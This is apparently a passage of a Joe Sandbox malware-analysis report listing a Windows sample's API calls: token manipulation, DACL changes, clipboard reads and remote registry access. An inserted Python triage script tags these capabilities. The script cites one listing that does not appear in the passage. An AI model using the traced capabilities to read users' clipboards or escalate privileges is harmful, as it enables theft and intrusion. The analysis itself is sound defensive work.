                                                                        • ScreenToClient.USER32(?,?), ref: 0106D60D
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0106D669
                                                                        • SendMessageW.USER32 ref: 0106D697
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0106D6D4
                                                                        • SendMessageW.USER32 ref: 0106D703
                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0106D724
                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0106D733
                                                                        • GetCursorPos.USER32(?), ref: 0106D753
                                                                        • ScreenToClient.USER32(?,?), ref: 0106D760
                                                                        • GetParent.USER32(?), ref: 0106D780
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0106D7E9
                                                                        • SendMessageW.USER32 ref: 0106D81A
                                                                        • ClientToScreen.USER32(?,?), ref: 0106D878
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0106D8A8
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0106D8D2
                                                                        • SendMessageW.USER32 ref: 0106D8F5
                                                                        • ClientToScreen.USER32(?,?), ref: 0106D947
                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0106D97B
                                                                          • Part of subcall function 00FE29AB: GetWindowLongW.USER32(?,000000EB), ref: 00FE29BC
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0106DA17
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                        • String ID: @GUI_DRAGID$F
                                                                        • API String ID: 3977979337-4164748364
                                                                        • Opcode ID: cdfd569009064c85299d2ba173493023655d0eecbd5e6866b60a47028a4f7466
                                                                        • Instruction ID: c1102625debb85cb8197fc423d0eae9ced2468b875526c764d27c3e98fe77356
                                                                        • Opcode Fuzzy Hash: cdfd569009064c85299d2ba173493023655d0eecbd5e6866b60a47028a4f7466
                                                                        • Instruction Fuzzy Hash: 4942BB30604341EFD721CFA8C844BAABBE9FF89710F144659F6E59B2A5C7B2D844CB91
                                                                        APIs
                                                                          • Part of subcall function 01039399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 010393E3
                                                                          • Part of subcall function 01039399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01039410
                                                                          • Part of subcall function 01039399: GetLastError.KERNEL32 ref: 0103941D
                                                                        • _memset.LIBCMT ref: 01038F71
                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 01038FC3
                                                                        • CloseHandle.KERNEL32(?), ref: 01038FD4
                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 01038FEB
                                                                        • GetProcessWindowStation.USER32 ref: 01039004
                                                                        • SetProcessWindowStation.USER32(00000000), ref: 0103900E
                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 01039028
                                                                          • Part of subcall function 01038DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01038F27), ref: 01038DFE
                                                                          • Part of subcall function 01038DE9: CloseHandle.KERNEL32(?,?,01038F27), ref: 01038E10
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                        • String ID: $default$winsta0
                                                                        • API String ID: 2063423040-1027155976
                                                                        • Opcode ID: 939b867149039d28395d61907fa4c4fd47e0efc2e1e0f185951fee4b4b60ee45
                                                                        • Instruction ID: 904e63585e6c134895df121fd3b2e73b09eff7a003a2e9b4e421a83bd8b33b05
                                                                        • Opcode Fuzzy Hash: 939b867149039d28395d61907fa4c4fd47e0efc2e1e0f185951fee4b4b60ee45
                                                                        • Instruction Fuzzy Hash: 82817E71D00209BFEF219FA4CC48AEEBBBDBF85308F154199FA90B6254D7768A14DB50
                                                                        APIs
                                                                        • OpenClipboard.USER32(01070980), ref: 0105465C
                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0105466A
                                                                        • GetClipboardData.USER32(0000000D), ref: 01054672
                                                                        • CloseClipboard.USER32 ref: 0105467E
                                                                        • GlobalLock.KERNEL32(00000000), ref: 0105469A
                                                                        • CloseClipboard.USER32 ref: 010546A4
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 010546B9
                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 010546C6
                                                                        • GetClipboardData.USER32(00000001), ref: 010546CE
                                                                        • GlobalLock.KERNEL32(00000000), ref: 010546DB
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0105470F
                                                                        • CloseClipboard.USER32 ref: 0105481F
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                        • String ID:
                                                                        • API String ID: 3222323430-0
                                                                        • Opcode ID: 4d7ad54917f9e45bdd5a55cf90fe18aab7ecb0603eceabc309267bf6a42830e3
                                                                        • Instruction ID: 2e65bc626592952b9d454b3f974fc41166b0f3c701c4c3f68672e375a26b9033
                                                                        • Opcode Fuzzy Hash: 4d7ad54917f9e45bdd5a55cf90fe18aab7ecb0603eceabc309267bf6a42830e3
                                                                        • Instruction Fuzzy Hash: B751B471604205ABE350EF64DC55FBF77A8AF89B00F000629FAC5E2199EF75D845CB62
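                                                                        The API listings above for the token/window-station function, the clipboard function and the FindFirstFileW/DeleteFileW subcall are call sequences that a triage script can tag without reading the disassembly. The Python below is an added example written for this page, not Joe Sandbox code and not code from the sample: it parses the bullet lines of an "APIs" listing in the format used on this page (Name.MODULE(args), ref: address, with the optional "Part of subcall function" prefix) and tags each function with the capability its call set implies. The three sample entries are copied from this page; the capability rules, the function names and the CF_TEXT/CF_UNICODETEXT decoding of GetClipboardData's first argument are the example's own assumptions, not Joe Sandbox signatures.

```python
"""Capability tagging for Joe Sandbox per-function 'APIs' listings.

Added example for this report page, not Joe Sandbox or sample code. It parses
the bullet lines of one function entry and tags the entry with heuristic
capabilities derived from the set of APIs called (directly or via subcall).
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# One API bullet of the report, e.g.
#   • OpenClipboard.USER32(01070980), ref: 0105465C
#   • Part of subcall function 01039399: GetLastError.KERNEL32 ref: 0103941D
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 standard clipboard format constants (first argument of GetClipboardData).
CLIPBOARD_FORMATS = {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT"}

# Heuristic rules (this example's own, not Joe Sandbox signatures): a tag applies
# when every listed API occurs in the function entry.
CAPABILITY_RULES = {
    "clipboard-read": {"OpenClipboard", "GetClipboardData", "GlobalLock"},
    "token-and-desktop-manipulation": {
        "AdjustTokenPrivileges", "DuplicateTokenEx",
        "OpenWindowStationW", "OpenDesktopW",
    },
    "directory-walk-and-delete": {"FindFirstFileW", "FindNextFileW", "DeleteFileW"},
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                 # address of the call site
    subcall: Optional[int]   # sub-function address when the call is indirect


def parse_api_listing(text: str) -> list[ApiCall]:
    """Return the API calls of one entry; headers such as 'APIs' are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["name"], m["module"].upper(), args,
                             int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls


def classify(calls: list[ApiCall]) -> list[str]:
    names = {c.name for c in calls}
    return sorted(tag for tag, needed in CAPABILITY_RULES.items() if needed <= names)


def clipboard_formats(calls: list[ApiCall]) -> list[str]:
    """Decode the format argument of each GetClipboardData call."""
    out = []
    for c in calls:
        if c.name == "GetClipboardData" and c.args:
            fmt = int(c.args[0], 16)
            out.append(CLIPBOARD_FORMATS.get(fmt, f"0x{fmt:X}"))
    return out


def triage(entry: str) -> dict:
    calls = parse_api_listing(entry)
    return {"calls": len(calls), "capabilities": classify(calls),
            "clipboard_formats": clipboard_formats(calls)}


# Sample entries copied from the API listings on this page.
CLIPBOARD_ENTRY = """
• OpenClipboard.USER32(01070980), ref: 0105465C
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0105466A
• GetClipboardData.USER32(0000000D), ref: 01054672
• CloseClipboard.USER32 ref: 0105467E
• GlobalLock.KERNEL32(00000000), ref: 0105469A
• CloseClipboard.USER32 ref: 010546A4
• GlobalUnlock.KERNEL32(00000000), ref: 010546B9
• IsClipboardFormatAvailable.USER32(00000001), ref: 010546C6
• GetClipboardData.USER32(00000001), ref: 010546CE
• GlobalLock.KERNEL32(00000000), ref: 010546DB
• GlobalUnlock.KERNEL32(00000000), ref: 0105470F
• CloseClipboard.USER32 ref: 0105481F
"""
TOKEN_ENTRY = """
• Part of subcall function 01039399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 010393E3
• Part of subcall function 01039399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01039410
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 01038FC3
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 01038FEB
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 01039028
"""
DELETE_ENTRY = """
• Part of subcall function 01044005: FindFirstFileW.KERNEL32(?,?), ref: 0104407C
• Part of subcall function 01044005: DeleteFileW.KERNEL32(?,?,?,?), ref: 010440CC
• Part of subcall function 01044005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 010440DD
• Part of subcall function 01044005: FindClose.KERNEL32(00000000), ref: 010440F4
• GetLastError.KERNEL32 ref: 0104C292
"""

if __name__ == "__main__":
    for label, entry in (("clipboard", CLIPBOARD_ENTRY), ("token", TOKEN_ENTRY),
                         ("delete", DELETE_ENTRY)):
        print(label, triage(entry))
```

                                                                        The rules match on API names only, so a function that reaches the clipboard through a wrapper would still be tagged as long as the report attributes the calls to it via "Part of subcall function"; conversely, an entry that only calls IsClipboardFormatAvailable without GetClipboardData is left untagged. Adding a rule is a matter of extending CAPABILITY_RULES with the API set the analyst considers sufficient.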
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0104CDD0
                                                                        • FindClose.KERNEL32(00000000), ref: 0104CE24
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0104CE49
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0104CE60
                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0104CE87
                                                                        • __swprintf.LIBCMT ref: 0104CED3
                                                                        • __swprintf.LIBCMT ref: 0104CF16
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                        • __swprintf.LIBCMT ref: 0104CF6A
                                                                          • Part of subcall function 010038C8: __woutput_l.LIBCMT ref: 01003921
                                                                        • __swprintf.LIBCMT ref: 0104CFB8
                                                                          • Part of subcall function 010038C8: __flsbuf.LIBCMT ref: 01003943
                                                                          • Part of subcall function 010038C8: __flsbuf.LIBCMT ref: 0100395B
                                                                        • __swprintf.LIBCMT ref: 0104D007
                                                                        • __swprintf.LIBCMT ref: 0104D056
                                                                        • __swprintf.LIBCMT ref: 0104D0A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                        • API String ID: 3953360268-2428617273
                                                                        • Opcode ID: 73aa6436f52cfcfbbb24cd0d2f84f40d118a3a5a36f9977f9753b84f9c7fbc23
                                                                        • Instruction ID: 854b570cefe9eb91dfc3e78ca7ecd3d23c70c55962eb6a098fec9871f744186e
                                                                        • Opcode Fuzzy Hash: 73aa6436f52cfcfbbb24cd0d2f84f40d118a3a5a36f9977f9753b84f9c7fbc23
                                                                        • Instruction Fuzzy Hash: 37A14BB1404345ABD720EBA5CD85DAFB7ECBF94704F40091DF685C6191EB38EA09DB62
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0104F5F9
                                                                        • _wcscmp.LIBCMT ref: 0104F60E
                                                                        • _wcscmp.LIBCMT ref: 0104F625
                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0104F637
                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 0104F651
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0104F669
                                                                        • FindClose.KERNEL32(00000000), ref: 0104F674
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0104F690
                                                                        • _wcscmp.LIBCMT ref: 0104F6B7
                                                                        • _wcscmp.LIBCMT ref: 0104F6CE
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0104F6E0
                                                                        • SetCurrentDirectoryW.KERNEL32(0109B578), ref: 0104F6FE
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0104F708
                                                                        • FindClose.KERNEL32(00000000), ref: 0104F715
                                                                        • FindClose.KERNEL32(00000000), ref: 0104F727
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                        • String ID: *.*
                                                                        • API String ID: 1803514871-438819550
                                                                        • Opcode ID: 4eb776bffa50f9508281c8006198c9a43f392c14a5f4e9d826d8faf7414d2ddf
                                                                        • Instruction ID: f6306646f8b97fd8e943ff826760af972d664b39d43b14520987d2526bc8088e
                                                                        • Opcode Fuzzy Hash: 4eb776bffa50f9508281c8006198c9a43f392c14a5f4e9d826d8faf7414d2ddf
                                                                        • Instruction Fuzzy Hash: CE31E77294120A6FEF21DABDEC88ADE77ECAF09221F1001A5F984E2190DF35D945CB60
                                                                        APIs
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01060FB3
                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,01070980,00000000,?,00000000,?,?), ref: 01061021
                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01061069
                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 010610F2
                                                                        • RegCloseKey.ADVAPI32(?), ref: 01061412
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0106141F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                        • API String ID: 536824911-966354055
                                                                        • Opcode ID: 8c113ef98055141bb3e0782d2e3060099146e7944819a35efab64418b35d009a
                                                                        • Instruction ID: a6d480a52ba8669558ae04db88692e373e374050224da12f479f94fba5d4a527
                                                                        • Opcode Fuzzy Hash: 8c113ef98055141bb3e0782d2e3060099146e7944819a35efab64418b35d009a
                                                                        • Instruction Fuzzy Hash: 13026B756006519FDB25EF29C850E2AB7E9FF89724F04895CF98A9B361CB34EC01CB81
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0104F756
                                                                        • _wcscmp.LIBCMT ref: 0104F76B
                                                                        • _wcscmp.LIBCMT ref: 0104F782
                                                                          • Part of subcall function 01044875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 01044890
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0104F7B1
                                                                        • FindClose.KERNEL32(00000000), ref: 0104F7BC
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0104F7D8
                                                                        • _wcscmp.LIBCMT ref: 0104F7FF
                                                                        • _wcscmp.LIBCMT ref: 0104F816
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0104F828
                                                                        • SetCurrentDirectoryW.KERNEL32(0109B578), ref: 0104F846
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0104F850
                                                                        • FindClose.KERNEL32(00000000), ref: 0104F85D
                                                                        • FindClose.KERNEL32(00000000), ref: 0104F86F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                        • String ID: *.*
                                                                        • API String ID: 1824444939-438819550
                                                                        • Opcode ID: 32fb81d993a6c3c49beef8397f3f7b8653ee2448555faca7a4317cebd94f10b9
                                                                        • Instruction ID: ebef6e2cc819c19458e8f33b610ad50dbd183c478bab178c7fde2af0d5ae271a
                                                                        • Opcode Fuzzy Hash: 32fb81d993a6c3c49beef8397f3f7b8653ee2448555faca7a4317cebd94f10b9
                                                                        • Instruction Fuzzy Hash: DE31A97290121F6BFF21DABDDCC8ADE77ACAF16221F1001A9F984E6190DB35DA45CB50
                                                                        APIs
                                                                          • Part of subcall function 01038E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01038E3C
                                                                          • Part of subcall function 01038E20: GetLastError.KERNEL32(?,01038900,?,?,?), ref: 01038E46
                                                                          • Part of subcall function 01038E20: GetProcessHeap.KERNEL32(00000008,?,?,01038900,?,?,?), ref: 01038E55
                                                                          • Part of subcall function 01038E20: HeapAlloc.KERNEL32(00000000,?,01038900,?,?,?), ref: 01038E5C
                                                                          • Part of subcall function 01038E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 01038E73
                                                                          • Part of subcall function 01038EBD: GetProcessHeap.KERNEL32(00000008,01038916,00000000,00000000,?,01038916,?), ref: 01038EC9
                                                                          • Part of subcall function 01038EBD: HeapAlloc.KERNEL32(00000000,?,01038916,?), ref: 01038ED0
                                                                          • Part of subcall function 01038EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,01038916,?), ref: 01038EE1
                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01038931
                                                                        • _memset.LIBCMT ref: 01038946
                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 01038965
                                                                        • GetLengthSid.ADVAPI32(?), ref: 01038976
                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 010389B3
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 010389CF
                                                                        • GetLengthSid.ADVAPI32(?), ref: 010389EC
                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 010389FB
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 01038A02
                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 01038A23
                                                                        • CopySid.ADVAPI32(00000000), ref: 01038A2A
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01038A5B
                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01038A81
                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 01038A95
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                        • String ID:
                                                                        • API String ID: 3996160137-0
                                                                        • Opcode ID: 71b89c731774f62e420180cc4acb216aa9f142a7cfd6ec6483b7731fd7ea105c
                                                                        • Instruction ID: cd3d99fe99d6435263c8afd252c8c0367f21e03c3fe1d7d84dc4f39276b7848a
                                                                        • Opcode Fuzzy Hash: 71b89c731774f62e420180cc4acb216aa9f142a7cfd6ec6483b7731fd7ea105c
                                                                        • Instruction Fuzzy Hash: E1616D7190010ABFEF15DF95DC44EEEBBB9FF45310F04829AF995A6280D7399A05CB60
                                                                        APIs
                                                                          • Part of subcall function 0106147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0106040D,?,?), ref: 01061491
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01060B0C
                                                                          • Part of subcall function 00FE4D37: __itow.LIBCMT ref: 00FE4D62
                                                                          • Part of subcall function 00FE4D37: __swprintf.LIBCMT ref: 00FE4DAC
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 01060BAB
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 01060C43
                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01060E82
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 01060E8F
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                        • String ID:
                                                                        • API String ID: 1240663315-0
                                                                        • Opcode ID: e87493a2f34ad73c34c9de207974f84b53a5d0fe58aade03d68a33846f57dae4
                                                                        • Instruction ID: 12fc864abf2b5fa96a4eaae477caf7cc63086c9df18b8c95e2479cac429114fe
                                                                        • Opcode Fuzzy Hash: e87493a2f34ad73c34c9de207974f84b53a5d0fe58aade03d68a33846f57dae4
                                                                        • Instruction Fuzzy Hash: F4E17C31204214AFC725DF29CC84E2EBBE9FF89314F04856DF589DB2A5DA35E801CB52
                                                                        APIs
                                                                        • __swprintf.LIBCMT ref: 01044451
                                                                        • __swprintf.LIBCMT ref: 0104445E
                                                                          • Part of subcall function 010038C8: __woutput_l.LIBCMT ref: 01003921
                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 01044488
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 01044494
                                                                        • LockResource.KERNEL32(00000000), ref: 010444A1
                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 010444C1
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 010444D3
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 010444E2
                                                                        • LockResource.KERNEL32(?), ref: 010444EE
                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0104454F
                                                                        Memory Dump Source
